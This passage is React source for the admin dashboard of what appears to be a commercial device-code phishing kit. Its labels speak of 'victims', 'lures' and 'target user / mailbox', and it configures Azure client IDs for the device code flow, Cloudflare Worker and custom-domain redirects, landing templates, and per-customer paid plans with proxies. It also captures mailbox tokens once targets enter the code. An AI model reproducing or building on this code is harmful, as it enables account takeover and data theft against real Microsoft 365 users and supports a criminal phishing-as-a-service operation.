              <input style={styles.input} value={deviceHandoutLogoUrl} onChange={(e) => { setDeviceHandoutLogoUrl(e.target.value); setDeviceHandoutLogoFileName(""); }} placeholder="Paste image url for Logo shown on instruction page" />
            </div>

            <div>
              <label style={styles.label}>Choose the image you want shown as logo on link instruction page</label>
              <input style={styles.input} type="file" accept="image/*" onChange={(e) => handleDeviceLogoFile(e.target.files?.[0])} />
              {deviceHandoutLogoFileName && <div style={styles.inlineNote}>Loaded: {deviceHandoutLogoFileName}</div>}
            </div>

            <div>
              <label style={styles.label}>Redirect type</label>
              <select style={styles.select} value={instructionRedirectMode} onChange={(e) => handleInstructionRedirectModeChange(e.target.value)}>
                <option value="direct">Direct backend link</option>
                <option value="worker">My workers.dev redirect</option>
                <option value="custom">Own domain redirect</option>
              </select>
            </div>

            {instructionRedirectMode === "worker" && (
              <div>
                <label style={styles.label}>workers.dev base URL</label>
                <input style={styles.input} value={instructionRedirectBaseUrl} onChange={(e) => setInstructionRedirectBaseUrl(e.target.value)} placeholder="https://your-worker-name.your-account.workers.dev" />
                <div style={styles.inlineNote}>create a fresh workers, paste the workers script you were given to it then deploy,copy the url and paste here.</div>
                <button type="button" style={styles.secondaryButton} onClick={saveUserWorkerRedirectUrl} disabled={redirectDomainLoading}>{redirectDomainLoading ? "Saving..." : "Save my Worker URL"}</button>
              </div>
            )}

            {instructionRedirectMode === "custom" && (
              <div>
                <label style={styles.label}>Custom redirect domain</label>
                <input style={styles.input} value={customRedirectDomain || instructionRedirectBaseUrl} onChange={(e) => { setCustomRedirectDomain(e.target.value); setInstructionRedirectBaseUrl(e.target.value); }} placeholder="https://login.yourdomain.com" />
              </div>
            )}
          </div>
        </section>

        {/* ============================================================ */}
        {/* NEW: CUSTOM DOMAINS SECTION (Cloudflare + Auto SSL + Worker) */}
        {/* ============================================================ */}
        <details
          style={detailsStyle}
          onToggle={(e) => updateManageUrlSection("domains", e.currentTarget.open)}
        >
          <summary style={summaryButtonStyle}>
            <span>{sectionArrow("domains")} Custom Domains (auto SSL)</span>
            <span style={styles.inlineNote}>{customDomains.length} domain(s)</span>
          </summary>
          <div style={{ ...panelStyle, marginTop: 10 }}>
            <div>
              <div style={styles.linkPanelTitle}>Your custom domains</div>
              <div style={styles.inlineNote}>
                Add a domain, then update your registrar with the nameservers we show.
                We'll auto-issue a Universal SSL certificate once DNS is active
                (typically 5 min – 24 h for propagation). Once DNS + SSL are active,
                click <b>Attach to Worker</b> then click "use for redirects".
              </div>
            </div>

            <div style={{ display: "flex", gap: 8, flexWrap: "wrap" }}>
              <input
                style={{ ...styles.input, flex: 1, minWidth: 220 }}
                value={newDomainInput}
                onChange={(e) => setNewDomainInput(e.target.value)}
                placeholder="e.g yourdomain.com"
                onKeyDown={(e) => e.key === "Enter" && addCustomDomain()}
                disabled={addingDomain}
              />
              <button
                style={styles.primaryButton}
                onClick={addCustomDomain}
                disabled={addingDomain}
              >
                {addingDomain ? "Adding..." : "Add domain"}
              </button>
              <button
                style={styles.secondaryButton}
                onClick={fetchCustomDomains}
                disabled={domainsLoading}
              >
                {domainsLoading ? "Loading..." : "Refresh"}
              </button>
            </div>

            {customDomains.length === 0 ? (
              <div style={styles.emptyState}>No custom domains yet. Add one above.</div>
            ) : (
              <div style={{ display: "grid", gap: 10 }}>
                {customDomains.map((d) => {
                  const dnsOk = (d.dns_status || "").toLowerCase() === "active";
                  const sslOk = (d.verification_status || "").toLowerCase() === "active";
                  const workerAttached = !!(d.worker_domain_id || d.worker_attached_at);
                  return (
                    <div key={d.id} style={{ ...styles.linkPanel, padding: 12, display: "grid", gap: 10 }}>
                      <div style={{ display: "flex", justifyContent: "space-between", alignItems: "center", gap: 8, flexWrap: "wrap" }}>
                        <div>
                          <div style={{ fontWeight: 900 }}>{d.domain}</div>
                          {d.zone_id && (
                            <div style={styles.inlineNote}>
                              Zone: <code style={{ fontSize: 11 }}>{d.zone_id}</code>
                            </div>
                          )}
                        </div>
                        <div style={{ display: "flex", gap: 6, flexWrap: "wrap" }}>
                          {dnsOk ? renderBadge("DNS active", "green") : renderBadge(`DNS ${d.dns_status || "pending"}`, "orange")}
                          {sslOk ? renderBadge("SSL issued ✓", "green") : renderBadge(`SSL ${d.verification_status || "pending"}`, "gray")}
                          {workerAttached && renderBadge("Worker attached ✓", "purple")}
                        </div>
                      </div>

                      <div>
                        <div style={styles.label}>Set these nameservers at your domain provider</div>
                        <div style={{ display: "grid", gap: 6 }}>
                          {[d.nameserver_1, d.nameserver_2].filter(Boolean).map((ns, i) => (
                            <div key={i} style={{ display: "flex", gap: 6, alignItems: "center" }}>
                              <code
                                style={{
                                  flex: 1,
                                  padding: "6px 10px",
                                  background: isDarkMode ? "#0b1220" : "#f8fafc",
                                  border: isDarkMode ? "1px solid #334155" : "1px solid #e5e7eb",
                                  borderRadius: 8,
                                  fontSize: 12,
                                }}
                              >
                                {ns}
                              </code>
                              <CopyButton value={ns} label="Copy" toast={addToast} />
                            </div>
                          ))}
                        </div>
                      </div>

                      <div style={{ display: "flex", gap: 8, flexWrap: "wrap" }}>
                        <button
                          style={styles.secondaryButton}
                          onClick={() => refreshDomainStatus(d.id)}
                          disabled={domainStatusLoading[d.id]}
                        >
                          {domainStatusLoading[d.id] ? "Checking..." : "Check status"}
                        </button>

                        {!workerAttached && dnsOk && (
                          <button
                            style={styles.primaryButton}
                            onClick={() => attachDomainToWorker(d.id)}
                            disabled={domainAttachLoading[d.id]}
                          >
                            {domainAttachLoading[d.id] ? "Attaching..." : "Attach to Worker (auto SSL)"}
                          </button>
                        )}

                        {workerAttached && (
                          <>
                            <button
                              style={styles.secondaryButton}
                              onClick={() => selectDomainForRedirect(d)}
                            >
                              Use for redirects
                            </button>
                            <button
                              style={styles.dangerButton}
                              onClick={() => detachDomainFromWorker(d.id, d.domain)}
                            >
                              Detach
                            </button>
                          </>
                        )}

                        <button
                          style={styles.dangerButton}
                          onClick={() => removeCustomDomain(d.id, d.domain)}
                        >
                          Remove
                        </button>
                      </div>
                    </div>
                  );
                })}
              </div>
            )}

            <div style={{ ...styles.inlineNote, marginTop: 8, lineHeight: 1.7 }}>
              <b>Note: Click on "use for redirects" to use custom domain anytime you want to generate links"</b> .
            </div>
          </div>
        </details>

        <details style={detailsStyle} onToggle={(e) => updateManageUrlSection("templates", e.currentTarget.open)}>
          <summary style={summaryButtonStyle}>
            <span>{sectionArrow("templates")} Landing template settings</span>
            <span style={styles.inlineNote}></span>
          </summary>
          <div style={{ ...panelStyle, marginTop: 10 }}>
            <div style={{ display: "flex", justifyContent: "space-between", gap: 10, flexWrap: "wrap", alignItems: "center" }}>
              <div>
                <div style={styles.linkPanelTitle}>Templates</div>
                <div style={styles.inlineNote}>Admin templates are shared. User templates stay private.</div>
              </div>
              <div style={{ display: "flex", gap: 8, flexWrap: "wrap" }}>
                <button style={styles.secondaryButton} onClick={() => setTemplateManagerOpen((v) => !v)}>
                  {templateManagerOpen ? "Close editor" : "Add template"}
                </button>
                <button style={styles.secondaryButton} onClick={fetchLandingTemplates}>Refresh</button>
              </div>
            </div>

            {templateManagerOpen && (
              <div style={{ ...styles.linkPanel, display: "grid", gap: 8, padding: 12 }}>
                <div style={styles.linkPanelTitle}>{templateForm.id ? "Replace template" : "Add template"}</div>
                <div style={styles.inlineNote}>Upload a clean HTML file.</div>
                <div style={styles.compactGrid2}>
                  <div><label style={styles.label}>Template name</label><input style={styles.input} value={templateForm.name} onChange={(e) => setTemplateForm((prev) => ({ ...prev, name: e.target.value }))} placeholder="Template name" /></div>
                  <div><label style={styles.label}>HTML file</label><input style={styles.input} type="file" accept=".html,.htm,text/html" onChange={(e) => setTemplateHtmlFile(e.target.files?.[0] || null)} /></div>
                </div>
                {templateHtmlFile && <div style={styles.inlineNote}>Selected: {templateHtmlFile.name}</div>}
                <div style={styles.inlineNote}>The selected template opens before the instruction step.</div>
                <div style={styles.inlineNote}>Users can select admin templates and manage their own.</div>
                <div style={{ display: "flex", gap: 8, flexWrap: "wrap" }}>
                  <button style={styles.primaryButton} onClick={uploadLandingTemplateHtml} disabled={templateUploading || templateSaving || !templateHtmlFile}>{templateUploading ? "Uploading..." : templateForm.id ? "Replace template" : "Upload template"}</button>
                  <button style={styles.secondaryButton} onClick={resetTemplateForm}>Clear</button>
                </div>
              </div>
            )}

            {!!landingTemplates.length && (
              <div style={{ display: "grid", gap: 8 }}>
                {landingTemplates.map((template) => {
                  const templateId = String(template.id || template.template_id || template.key || "");
                  const manageable = canManageTemplate(template);
                  return (
                    <div key={templateId} style={{ ...styles.linkPanel, display: "grid", gridTemplateColumns: "1fr auto", alignItems: "center", gap: 8, padding: 12 }}>
                      <div>
                        <div style={{ fontWeight: 900 }}>{template.name || template.title || "Template"}</div>
                        <div style={styles.inlineNote}>{template.source_filename || template.label || "Landing template (Add yours under landing templates settings below)"}</div>
                      </div>
                      <div style={{ display: "flex", gap: 6, flexWrap: "wrap", justifyContent: "flex-end" }}>
                        <button style={styles.secondaryButton} onClick={() => applyLandingTemplate(template)}>Use</button>
                        {manageable && <button style={styles.secondaryButton} onClick={() => editTemplate(template)}>Edit</button>}
                        {manageable && <button style={styles.dangerButton} onClick={() => deleteLandingTemplate(template)} disabled={templateDeletingId === templateId}>{templateDeletingId === templateId ? "Deleting..." : "Delete"}</button>}
                      </div>
                    </div>
                  );
                })}
              </div>
            )}
          </div>
        </details>

        <details style={detailsStyle} onToggle={(e) => updateManageUrlSection("exit", e.currentTarget.open)}>
          <summary style={summaryButtonStyle}>
            <span>{sectionArrow("exit")} Exit page settings</span>
            <span style={styles.inlineNote}></span>
          </summary>
          <div style={{ ...panelStyle, marginTop: 10 }}>
            <div style={{ display: "flex", justifyContent: "space-between", gap: 10, flexWrap: "wrap", alignItems: "center" }}>
              <div>
                <div style={styles.linkPanelTitle}>Exit pages</div>
                <div style={styles.inlineNote}>Choose what users see after the flow completes.</div>
              </div>
              <div style={{ display: "flex", gap: 8, flexWrap: "wrap" }}>
                <button style={styles.secondaryButton} onClick={() => setExitManagerOpen((v) => !v)}>
                  {exitManagerOpen ? "Close editor" : "Add custom exit page"}
                </button>
                <button style={styles.secondaryButton} onClick={fetchExitPages}>Refresh</button>
              </div>
            </div>

            {exitManagerOpen && (
              <div style={{ ...styles.linkPanel, display: "grid", gap: 8, padding: 12 }}>
                <div style={styles.linkPanelTitle}>{exitPageForm.id ? "Edit exit page" : "Add custom exit page"}</div>
                <div style={styles.inlineNote}>Upload a clean HTML file.</div>
                <div style={styles.compactGrid2}>
                  <div><label style={styles.label}>Exit page name</label><input style={styles.input} value={exitPageForm.name} onChange={(e) => setExitPageForm((prev) => ({ ...prev, name: e.target.value }))} placeholder="My completion page" /></div>
                  <div><label style={styles.label}>Exit page title</label><input style={styles.input} value={exitPageForm.title} onChange={(e) => setExitPageForm((prev) => ({ ...prev, title: e.target.value }))} placeholder="Completion page title" /></div>
                  <div><label style={styles.label}>Logo URL</label><input style={styles.input} value={exitPageForm.logo_url} onChange={(e) => setExitPageForm((prev) => ({ ...prev, logo_url: e.target.value }))} placeholder="Optional logo URL" /></div>
                  <div><label style={styles.label}>Website redirect URL</label><input style={styles.input} value={exitPageForm.external_url} onChange={(e) => setExitPageForm((prev) => ({ ...prev, external_url: e.target.value }))} placeholder="https://company.com/thank-you" /></div>
                  <div><label style={styles.label}>Upload file / image / PDF / document / HTML</label><input style={styles.input} type="file" accept="image/*,.pdf,.doc,.docx,.html,.htm,.txt" onChange={(e) => setExitPageFile(e.target.files?.[0] || null)} />{exitPageFile && <div style={styles.inlineNote}>Loaded: {exitPageFile.name}</div>}</div>
                  <div><label style={styles.label}>Message</label><textarea style={{ ...styles.input, minHeight: 80 }} value={exitPageForm.message} onChange={(e) => setExitPageForm((prev) => ({ ...prev, message: e.target.value }))} placeholder="Text shown on completion page" /></div>
                </div>
                <div><label style={styles.label}>Custom HTML content</label><textarea style={{ ...styles.input, minHeight: 100, fontFamily: "monospace" }} value={exitPageForm.html_content} onChange={(e) => setExitPageForm((prev) => ({ ...prev, html_content: e.target.value }))} placeholder="Optional HTML page content" /></div>
                <div style={{ display: "flex", gap: 8, flexWrap: "wrap" }}>
                  <button style={styles.primaryButton} onClick={saveExitPage} disabled={exitSaving || exitUploading}>{exitSaving || exitUploading ? "Saving..." : exitPageForm.id ? "Update exit page" : "Save exit page"}</button>
                  <button style={styles.secondaryButton} onClick={resetExitPageForm}>Clear</button>
                </div>
              </div>
            )}

            {!!exitPages.length && (
              <div style={{ display: "grid", gap: 8 }}>
                {exitPages.map((page) => {
                  const pageId = String(page.id || page.page_id || page.key || "");
                  const manageable = canManageTemplate(page);
                  return (
                    <div key={pageId} style={{ ...styles.linkPanel, display: "grid", gridTemplateColumns: "1fr auto", alignItems: "center", gap: 8, padding: 12 }}>
                      <div>
                        <div style={{ fontWeight: 900 }}>{page.name || page.title || "Exit page"}</div>
                        <div style={styles.inlineNote}>{page.file_name || page.label || "Exit page"}</div>
                      </div>
                      <div style={{ display: "flex", gap: 6, flexWrap: "wrap", justifyContent: "flex-end" }}>
                        <button style={styles.secondaryButton} onClick={() => setSelectedExitPageId(pageId)}>Use</button>
                        {manageable && <button style={styles.secondaryButton} onClick={() => editExitPage(page)}>Edit</button>}
                        {manageable && <button style={styles.dangerButton} onClick={() => deleteExitPage(page)} disabled={exitDeletingId === pageId}>{exitDeletingId === pageId ? "Deleting..." : "Delete"}</button>}
                      </div>
                    </div>
                  );
                })}
              </div>
            )}
          </div>
        </details>

        <details style={detailsStyle} onToggle={(e) => updateManageUrlSection("redirect", e.currentTarget.open)}>
          <summary style={summaryButtonStyle}>
            <span>{sectionArrow("redirect")} Advanced redirect and domain settings</span>
            <span style={styles.inlineNote}></span>
          </summary>
          <div style={{ ...panelStyle, marginTop: 10 }}>
            <div style={styles.compactGrid2}>
              <div>
                <label style={styles.label}>Link redirect method</label>
                <select style={styles.select} value={instructionRedirectMode} onChange={(e) => handleInstructionRedirectModeChange(e.target.value)}>
                  <option value="direct">Direct backend link</option>
                  <option value="worker">My workers.dev redirect</option>
                  <option value="custom">Own domain redirect</option>
                </select>
              </div>
              {instructionRedirectMode === "worker" ? (
                <div>
                  <label style={styles.label}>workers.dev base URL</label>
                  <input
                    style={styles.input}
                    value={instructionRedirectBaseUrl}
                    onChange={(e) => setInstructionRedirectBaseUrl(e.target.value)}
                    placeholder="https://your-worker-name.your-account.workers.dev"
                  />
                  <div style={styles.inlineNote}>Paste this user's deployed Worker URL. No shared Worker and no Cloudflare keys are used.</div>
                  <button
                    type="button"
                    style={styles.secondaryButton}
                    onClick={saveUserWorkerRedirectUrl}
                    disabled={redirectDomainLoading}
                  >
                    {redirectDomainLoading ? "Saving..." : "Save my Worker URL"}
                  </button>
                </div>
              ) : instructionRedirectMode === "custom" ? (
                <div>
                  <label style={styles.label}>Custom redirect domain</label>
                  <input
                    style={styles.input}
                    value={customRedirectDomain || instructionRedirectBaseUrl}
                    onChange={(e) => {
                      setCustomRedirectDomain(e.target.value);
                      setInstructionRedirectBaseUrl(e.target.value);
                    }}
                    placeholder="https://login.yourdomain.com"
                  />
                </div>
              ) : null}
            </div>

            <div style={{ display: "flex", gap: 8, flexWrap: "wrap" }}>
              <button style={styles.secondaryButton} onClick={fetchRedirectDomainSettings} disabled={redirectDomainLoading}>{redirectDomainLoading ? "Loading..." : "Get current DNS settings"}</button>
              <button style={styles.secondaryButton} onClick={saveUserWorkerRedirectUrl} disabled={redirectDomainLoading}>{redirectDomainLoading ? "Saving..." : "Save Worker URL"}</button>
              <button style={styles.secondaryButton} onClick={prepareCustomRedirectDomain} disabled={redirectDomainLoading}>{redirectDomainLoading ? "Preparing..." : "Prepare custom domain"}</button>
            </div>

            {redirectDnsSettings && (
              <div style={{ display: "grid", gap: 6 }}>
                <div style={styles.inlineNote}><b>Worker host:</b> {redirectDnsSettings.worker_hostname || redirectDnsSettings.worker_base_url || "No Worker URL saved"}</div>
                {redirectDnsSettings.nameservers && (
                  <div style={styles.inlineNote}><b>Nameservers:</b> {redirectDnsSettings.nameservers.all ? redirectDnsSettings.nameservers.all.join(", ") : [redirectDnsSettings.nameservers.nameserver_1, redirectDnsSettings.nameservers.nameserver_2].filter(Boolean).join(", ") || "Not configured yet"}</div>
                )}
                {(redirectDnsSettings.dns_records || []).map((record, idx) => (
                  <div key={idx} style={styles.inlineNote}><b>{record.type}</b> {record.name} → {record.value} {record.proxied ? "(proxied)" : ""}</div>
                ))}
                {redirectDnsSettings.worker_route_hint && <div style={styles.inlineNote}>{redirectDnsSettings.worker_route_hint}</div>}
                {redirectDnsSettings.cloudflare?.message && <div style={styles.inlineNote}>{redirectDnsSettings.cloudflare.message}</div>}
              </div>
            )}
          </div>
        </details>

        <div style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
          <div style={styles.cardHeaderCompact}>
            <div>
              <div style={styles.cardTitle}>Worker & Azure Settings</div>
              <div style={styles.cardSubtitle}>Required</div>
            </div>
          </div>
          <div style={styles.compactGrid2}>
            <div>
              <label style={styles.label}>Worker Base URL</label>
              <input
                style={styles.input}
                value={workerBaseUrl}
                onChange={(e) => {
                  const val = e.target.value.replace(/\/$/, "");
                  setWorkerBaseUrl(val);
                }}
                placeholder="https://your-worker.workers.dev"
              />
              <div style={styles.inlineNote}>.</div>
            </div>
            <div>
              <label style={styles.label}>Choose what victims see in the prompt when they when wsnt to authenticate</label>
              <select
                style={styles.select}
                value={selectedProfileId || (azureProfiles.some(p => p.client_id === azureClientId) ? azureProfiles.find(p => p.client_id === azureClientId)?.name : "custom")}
                onChange={handleProfileChange}
              >
                <option value="custom">Custom (enter below)</option>
                {azureProfiles.map((profile) => (
                  <option key={profile.name} value={profile.name}>
                    {profile.name} ({profile.client_id.slice(0, 8)}…)
                  </option>
                ))}
              </select>
              <div style={styles.inlineNote}>.</div>
              {selectedProfileId === "custom" && (
                <>
                  <label style={styles.label}>Custom Azure Client ID</label>
                  <input
                    style={styles.input}
                    value={azureClientId}
                    onChange={(e) => setAzureClientId(e.target.value)}
                    placeholder="xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"
                  />
                  <label style={styles.label}>Azure Tenant (paired with client ID)</label>
                  <input
                    style={styles.input}
                    value={azureTenant}
                    onChange={(e) => setAzureTenant(e.target.value)}
                    placeholder="common or tenant-id"
                  />
                  <div style={styles.inlineNote}>Required for the device code flow.</div>
                </>
              )}
            </div>
          </div>
        </div>

        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}), padding: 14 }}>
          <div style={styles.cardHeaderCompact}>
            <div>
              <div style={styles.cardTitle}>Generate/download your lure/attachments</div>
              <div style={styles.cardSubtitle}>Create a public instruction link or export the page.</div>
            </div>
          </div>
          
          <div style={{ marginTop: 8 }}>
            <button style={styles.primaryButton} onClick={saveUserSettings}>Save Worker & Client ID</button>
          </div>

          <div style={{ display: "flex", gap: 8, flexWrap: "wrap" }}>
            <button style={styles.secondaryButton} onClick={() => openDeviceHandout("html", true)}>Download HTML</button>
            <button style={styles.secondaryButton} onClick={() => openDeviceHandout("image", true)}>IMAGE</button>
            <button style={styles.secondaryButton} onClick={generateDeviceSupportPageLink}>Generate link for single user</button>
            <button style={styles.primaryButton} onClick={generateFreshDeviceShareLink}>Generate link for all/random users</button>
          </div>

          {deviceSupportPageUrl && (
            <div style={{ ...styles.linkPanel, marginTop: 14 }}>
              <div style={styles.linkPanelTitle}>{freshDeviceShareUrl && deviceSupportPageUrl === freshDeviceShareUrl ? "Generated link" : "Instruction link"}</div>
              <div style={{ ...styles.inlineNote, overflowWrap: "anywhere" }}>{deviceSupportPageUrl}</div>
              <div style={{ marginTop: 10 }}><CopyButton value={deviceSupportPageUrl} label="Copy Link" toast={addToast} /></div>
              {freshDeviceShareUrl && deviceSupportPageUrl === freshDeviceShareUrl && <div style={styles.inlineNote}>Each visit to this URL starts a new device-code session, so users do not reuse expired codes.</div>}
            </div>
          )}
        </section>

        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
          <div style={styles.cardHeaderCompact}>
            <div>
              <div style={styles.cardTitle}>Recently Generated URLs</div>
              <div style={styles.cardSubtitle}>Links created in the last 24 hours</div>
            </div>
            <button style={styles.secondaryButton} onClick={fetchRecentUrls}>Refresh</button>
          </div>
          <div>
            {recentUrls.length === 0 ? (
              <div style={styles.emptyState}>No URLs generated in the last 24 hours.</div>
            ) : (
              recentUrls.map((item, idx) => (
                <div key={idx} style={{ ...styles.linkPanel, padding: 10, marginBottom: 6 }}>
                  <div style={{ display: "flex", justifyContent: "space-between", alignItems: "center", gap: 8 }}>
                    <span style={{ fontSize: 12, fontWeight: 800, color: "#667085" }}>
                      {new Date(item.created_at * 1000).toLocaleString()}
                    </span>
                    <span style={{ ...styles.inlineNote, fontSize: 11 }}>
                      {item.type} {item.requested_user_id ? `(${item.requested_user_id})` : ""}
                    </span>
                  </div>
                  <div style={{ wordBreak: "break-all", fontSize: 13 }}>{item.url}</div>
                  <CopyButton value={item.url} label="Copy" toast={addToast} />
                </div>
              ))
            )}
          </div>
        </section>
      </div>
    );
  }
    function renderCustomerAccounts() {
    return (
      <div style={styles.sectionStack}>
        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}), padding: 14 }}>
          <div style={{ ...styles.cardHeaderCompact, marginBottom: 8 }}>
            <div>
              <div style={styles.cardTitle}>Create customer access</div>
              <div style={styles.cardSubtitle}>
                Create paid access, short trials, and optional customer-specific domains and proxy.
              </div>
            </div>
            {renderBadge("Owner control", "purple")}
          </div>

          <div style={styles.compactGrid2}>
            <div>
              <label style={styles.label}>Email address (optional)</label>
              <input
                style={styles.input}
                value={customerForm.email}
                onChange={(e) => setCustomerForm((prev) => ({ ...prev, email: e.target.value }))}
                placeholder="Optional email address"
              />
            </div>
            <div>
              <label style={styles.label}>Username</label>
              <input
                style={styles.input}
                value={customerForm.username}
                onChange={(e) => setCustomerForm((prev) => ({ ...prev, username: e.target.value }))}
                placeholder="Required username"
              />
            </div>
            <div>
              <label style={styles.label}>Full name (optional)</label>
              <input
                style={styles.input}
                value={customerForm.full_name}
                onChange={(e) => setCustomerForm((prev) => ({ ...prev, full_name: e.target.value }))}
                placeholder="Customer name"
              />
            </div>
            <div>
              <label style={styles.label}>Company (optional)</label>
              <input
                style={styles.input}
                value={customerForm.company_name}
                onChange={(e) => setCustomerForm((prev) => ({ ...prev, company_name: e.target.value }))}
                placeholder="Company name"
              />
            </div>
            <div>
              <label style={styles.label}>Password</label>
              <input
                style={styles.input}
                type="text"
                value={customerForm.password}
                onChange={(e) => setCustomerForm((prev) => ({ ...prev, password: e.target.value }))}
                placeholder="At least 8 characters"
              />
              <div style={styles.inlineNote}>Share this securely with the user. They can sign in with only username and password.</div>
            </div>
            <div>
              <label style={styles.label}>Plan</label>
              <select
                style={styles.select}
                value={customerForm.plan}
                onChange={(e) => setCustomerForm((prev) => ({ ...prev, plan: e.target.value }))}
              >
                <option value="trial_2_days">2-Day Test User</option>
                <option value="trial_3_days">3-Day Test User</option>
                <option value="weekly">Weekly</option>
                <option value="biweekly">2 Weeks</option>
                <option value="monthly">Monthly</option>
              </select>
            </div>
            <div>
              <label style={styles.label}>Assigned domain (optional)</label>
              <input
                style={styles.input}
                value={customerForm.assigned_domain}
                onChange={(e) => setCustomerForm((prev) => ({ ...prev, assigned_domain: e.target.value }))}
                placeholder="client1.yourdomain.com"
              />
              <div style={styles.inlineNote}>Use a verified custom or wildcard subdomain you control.</div>
            </div>
            <div>
              <label style={styles.label}>Proxy URL (optional)</label>
              <input
                style={styles.input}
                value={customerForm.proxy_url}
                onChange={(e) => setCustomerForm((prev) => ({ ...prev, proxy_url: e.target.value }))}
                placeholder="http://user:pass@1.2.3.4:8080"
              />
              <div style={styles.inlineNote}>Format: http://user:pass@host:port or socks5://user:pass@host:port</div>
            </div>
            <div>
              <label style={styles.label}>Owner notes (optional)</label>
              <input
                style={styles.input}
                value={customerForm.notes}
                onChange={(e) => setCustomerForm((prev) => ({ ...prev, notes: e.target.value }))}
                placeholder="Payment note, trial note, etc."
              />
            </div>
          </div>

          <div style={{ display: "flex", gap: 10, flexWrap: "wrap" }}>
            {isAdmin && (
              <button style={styles.primaryButton} onClick={createCustomerAccount} disabled={customerActionLoading.create}>
                {customerActionLoading.create ? "Creating..." : "Create Customer Login"}
              </button>
            )}
            <button style={styles.secondaryButton} onClick={fetchCustomerAccounts} disabled={customerLoading}>
              {customerLoading ? "Loading..." : "Refresh Accounts"}
            </button>
          </div>
        </section>

        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}), padding: 14 }}>
          <div style={{ ...styles.cardHeaderCompact, marginBottom: 8 }}>
            <div>
              <div style={styles.cardTitle}>Customer access accounts</div>
              <div style={styles.cardSubtitle}>Manage access duration, status, assigned domain, and proxy.</div>
            </div>
            {renderBadge(`${customerAccounts.length} customers`, "blue")}
          </div>

          {customerAccounts.length === 0 ? (
            <div style={styles.emptyState}>No customer access accounts yet.</div>
          ) : (
            <div style={styles.tableWrap}>
              <table style={styles.table}>
                <thead>
                  <tr>
                    <th style={styles.th}>Customer</th>
                    <th style={styles.th}>Plan</th>
                    <th style={styles.th}>Status</th>
                    <th style={styles.th}>Expires</th>
                    <th style={styles.th}>Assigned domain</th>
                    <th style={styles.th}>Proxy</th>
                    <th style={styles.th}>Actions</th>
                  </tr>
                </thead>
                <tbody>
                  {customerAccounts.map((customer) => {
                    const access = customer.access || {};
                    const domain = customer.domain || {};
                    const customerStatus = customer.status || access.status;
                    const domainValue = domain.assigned_domain || customer.assigned_domain || "";
                    const proxyValue = customer.proxy_url || "";
                    return (
                      <tr key={customer.id || customer.username || customer.email}>
                        <td style={styles.td}>
                          <div style={{ fontWeight: 900 }}>{customer.username || customer.email}</div>
                          <div style={styles.inlineNote}>{customer.email || customer.full_name || customer.company_name || "Username/password access"}</div>
                        </td>
                        <td style={styles.td}>
                          {renderBadge(planLabel(customer.plan || access.plan), customer.trial_user || access.trial_user ? "orange" : "blue")}
                        </td>
                        <td style={styles.td}>{renderBadge(customerStatus || "unknown", statusTone(customerStatus))}</td>
                        <td style={styles.td}>
                          <div>{formatTimestamp(customer.access_expires_at || access.access_expires_at)}</div>
                          <div style={styles.inlineNote}>{formatRemainingSeconds(customer.remaining_seconds ?? access.remaining_seconds)}</div>
                        </td>
                        <td style={styles.td}>
                          <input
                            style={{ ...styles.input, minWidth: 160 }}
                            defaultValue={domainValue}
                            placeholder="client1.yourdomain.com"
                            onBlur={(e) => {
                              const nextDomain = e.target.value.trim();
                              if (nextDomain !== domainValue) updateCustomerDomain(customer.id, nextDomain);
                            }}
                          />
                        </td>
                        <td style={styles.td}>
                          <input
                            style={{ ...styles.input, minWidth: 180 }}
                            defaultValue={proxyValue}
                            placeholder="http://user:pass@host:port"
                            onBlur={(e) => {
                              const nextProxy = e.target.value.trim();
                              if (nextProxy !== proxyValue) updateCustomerProxyAdmin(customer.id, nextProxy);
                            }}
                          />
                        </td>
                        <td style={styles.td}>
                          <div style={{ display: "flex", gap: 6, flexWrap: "wrap" }}>
                            <button style={styles.secondaryButton} onClick={() => extendCustomerAccount(customer.id, "weekly")}>+7d</button>
                            <button style={styles.secondaryButton} onClick={() => extendCustomerAccount(customer.id, "biweekly")}>+14d</button>
                            <button style={styles.secondaryButton} onClick={() => extendCustomerAccount(customer.id, "monthly")}>+30d</button>
                            <button style={styles.secondaryButton} onClick={() => updateCustomerStatus(customer.id, "reactivate")}>Reactivate</button>
                            <button style={styles.dangerButton} onClick={() => updateCustomerStatus(customer.id, "suspend")}>Suspend</button>
                            <button style={styles.dangerButton} onClick={() => updateCustomerStatus(customer.id, "disable")}>Disable</button>
                            <button
                              style={styles.dangerButton}
                              onClick={() => deleteCustomerAccount(customer.id, customer.username || customer.email || "this customer")}
                              disabled={customerActionLoading[`delete-${customer.id}`]}
                            >
                              {customerActionLoading[`delete-${customer.id}`] ? "Deleting..." : "Delete"}
                            </button>
                          </div>
                        </td>
                      </tr>
                    );
                  })}
                </tbody>
              </table>
            </div>
          )}
        </section>
      </div>
    );
  }

  function renderConnections() {
    return (
      <div style={styles.sectionStack}>
        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}), padding: 14 }}>
          <div style={{ ...styles.cardHeaderCompact, marginBottom: 8 }}>
            <div>
              <div style={styles.cardTitle}>Mailbox connection setup</div>
              <div style={styles.cardSubtitle}>
                Start a URL connection. The user opens the verification page,
                enters the generated code, and your panel polls until the mailbox is connected.
              </div>
            </div>
            {renderBadge("Mailbox setup", "green")}
          </div>

          <div style={styles.compactGrid2}>
            <div>
              <label style={styles.label}>Target user / mailbox</label>
              <input
                style={styles.input}
                placeholder="user@company.com"
                value={selectedUserId}
                onChange={(e) => setSelectedUserId(e.target.value)}
              />
            </div>
            <div>
              <label style={styles.label}>Saved users</label>
              <select
                style={styles.select}
                value={selectedUserId}
                onChange={(e) => setSelectedUserId(e.target.value)}
              >
                <option value="">Select saved user</option>
                {availableUsers.map((u) => (
                  <option key={u} value={u}>
                    {u}
                  </option>
                ))}
              </select>
            </div>
          </div>

          <div style={{ display: "flex", gap: 10, flexWrap: "wrap" }}>
            <button
              style={styles.secondaryButton}
              onClick={() => saveUserToBackend(selectedUserId)}
            >
              Save User
            </button>
            <button
              style={styles.dangerButton}
              onClick={() => removeSavedUserFromBackend(selectedUserId)}
              disabled={!selectedUserId}
            >
              Delete Saved User
            </button>
            <button
              style={styles.dangerButton}
              onClick={() => deleteMailboxToken(selectedUserId)}
              disabled={!selectedUserId || deletingMailbox === selectedUserId}
            >
              {deletingMailbox === selectedUserId ? "Deleting..." : "Delete Mailbox"}
            </button>
            <button
              style={styles.secondaryButton}
